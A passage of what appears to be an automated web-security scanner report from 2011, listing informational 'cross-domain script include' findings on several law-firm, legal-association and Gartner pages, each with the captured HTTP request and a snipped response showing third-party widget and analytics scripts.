Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/about/staff
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:56:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 17:56:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 10532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.19. http://www.elawmarketing.com/portfolio/websites  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /portfolio/websites

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portfolio/websites HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:59:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 17:59:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.20. http://www.elawmarketing.com/portfolio/websites/diserio-martin-oconnor-castiglioni-llp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /portfolio/websites/diserio-martin-oconnor-castiglioni-llp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portfolio/websites/diserio-martin-oconnor-castiglioni-llp HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:07:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 18:07:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.21. http://www.elawmarketing.com/portfolio/websites/layser-freiwald  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /portfolio/websites/layser-freiwald

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portfolio/websites/layser-freiwald HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/pomerantz-haudek-grossman-gross-llp
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 18:08:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.22. http://www.elawmarketing.com/portfolio/websites/los-angeles-chapter-association-legal-administrators  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /portfolio/websites/los-angeles-chapter-association-legal-administrators

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portfolio/websites/los-angeles-chapter-association-legal-administrators HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/pomerantz-haudek-grossman-gross-llp
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 18:08:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.23. http://www.elawmarketing.com/portfolio/websites/orange-county-chapter-association-legal-administrators  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /portfolio/websites/orange-county-chapter-association-legal-administrators

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portfolio/websites/orange-county-chapter-association-legal-administrators HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/pomerantz-haudek-grossman-gross-llp
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 18:08:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.24. http://www.elawmarketing.com/portfolio/websites/pomerantz-haudek-grossman-gross-llp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /portfolio/websites/pomerantz-haudek-grossman-gross-llp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portfolio/websites/pomerantz-haudek-grossman-gross-llp HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/diserio-martin-oconnor-castiglioni-llp
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:20 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 18:08:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.25. http://www.elawmarketing.com/portfolio/websites/rothman-consulting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /portfolio/websites/rothman-consulting

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portfolio/websites/rothman-consulting HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/pomerantz-haudek-grossman-gross-llp
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 18:08:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.26. http://www.elawmarketing.com/portfolio/websites/wisconsin-chapter-association-legal-administrators  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /portfolio/websites/wisconsin-chapter-association-legal-administrators

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portfolio/websites/wisconsin-chapter-association-legal-administrators HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/pomerantz-haudek-grossman-gross-llp
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 18:08:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.27. http://www.fundingpost.com/breakfast/reg1.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fundingpost.com
Path:   /breakfast/reg1.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /breakfast/reg1.asp HTTP/1.1
Host: www.fundingpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:58:00 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 31878
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASBDRADC=LEEPDOEBCHLNHGEIKICLELCC; path=/
Cache-control: private


<HTML>
<HEAD>
<TITLE>Media and Entertainment Investing Conference on Thursday, Oct 27, 2011 in Miami, FL</TITLE>

<style type="text/css">
#gg3557883 {display: none;}

.photovideo
{
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<!---------------- OPENTRACKER HTML START ----------------->
<script defer src="http://server11.opentracker.net/?site=www.fundingpost.com"></script>
...[SNIP]...
25.28. http://www.gartner.com/technology/cio-priorities/ipad-business.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /technology/cio-priorities/ipad-business.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technology/cio-priorities/ipad-business.jsp?prm=TW_CHCIOP HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231564450:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.1.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 12 May 2011 20:19:30 GMT
ETag: "pv532dde66121797e6486e070ed61b7cf6"
X-PvInfo: [S10202.C10821.A158661.RA0.G26D17.UDB73D7C6].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 26186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<h
...[SNIP]...
</a>
       <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>

       <script src="http://www.stumbleupon.com/hostedbadge.php?s=1"></script>
...[SNIP]...
25.29. http://www.gartner.com/technology/vendor-insights/procurement-sourcing-technology.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /technology/vendor-insights/procurement-sourcing-technology.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technology/vendor-insights/procurement-sourcing-technology.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/vendor-insights/
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231763750:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.3.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LoginWLSessionID=dj22NMQfh16FmhxVgWyctlxb73Tc6GtpjZsgcTX6L9DvmxX5cNHZ!-1907662523

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 12 May 2011 20:22:48 GMT
ETag: "pv9b3f33d7c6acae18e3084e87a594a8df"
X-PvInfo: [S10202.C10821.A158661.RA0.G26D17.U8FFB248B].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 26525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<h
...[SNIP]...
</a>
       <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>

       <script src="http://www.stumbleupon.com/hostedbadge.php?s=1"></script>
...[SNIP]...
25.30. http://www.glaala.org/clubportal/glaala/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.glaala.org
Path:   /clubportal/glaala/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /clubportal/glaala/index.cfm HTTP/1.1
Host: www.glaala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/los-angeles-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:09:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26522753;expires=Sat, 04-May-2041 18:09:12 GMT;path=/
Set-Cookie: CFTOKEN=12f7bbc61c5272e7-E565EA0E-BA1E-6532-B5060418FAD67737;expires=Sat, 04-May-2041 18:09:12 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522753%26CFTOKEN%23%3D12f7bbc61c5272e7%2DE565EA0E%2DBA1E%2D6532%2DB5060418FAD67737%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A12%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A12%27%7D%23hitcount%3D2%23cftoken%3D12f7bbc61c5272e7%2DE565EA0E%2DBA1E%2D6532%2DB5060418FAD67737%23cfid%3D26522753%23;expires=Sat, 04-May-2041 18:09:12 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <html>
   <head>
   <LINK REL="SHORTCUT ICON" HREF="/clubportal/images/clubimages/194/favicon.ico">
   <title>
   legal administrator, ala, GLA, los angeles -
   </title>
   
   
           <meta name="keyw
...[SNIP]...
</table>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
25.31. http://www.hartfordbusiness.com/news14300.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news14300.html HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=1b8355f904f52bc3571b2b0ee9c39004; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34848

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a71fdfa0c624489"></script>
...[SNIP]...
25.32. http://www.howardrice.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39373
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Set-Cookie: ASP.NET_SessionId=pe3xaq55hraylnfzs1r5cd45; path=/; HttpOnly
Date: Thu, 12 May 2011 16:09:18 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Howard Rice
<
...[SNIP]...
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js" type="text/javascript" language="javascript"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d23b78f23506219"></script>
...[SNIP]...
</body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
25.33. http://www.howardrice.com/6862  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /6862

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /6862 HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/
Cookie: currentLang=en-US; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.2.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33063
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Date: Thu, 12 May 2011 16:12:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<link rel="Stylesheet" type="text/css" media="print" href="print.css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js" type="text/javascript" language="javascript"></script>
<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js"></script>
...[SNIP]...
</a>
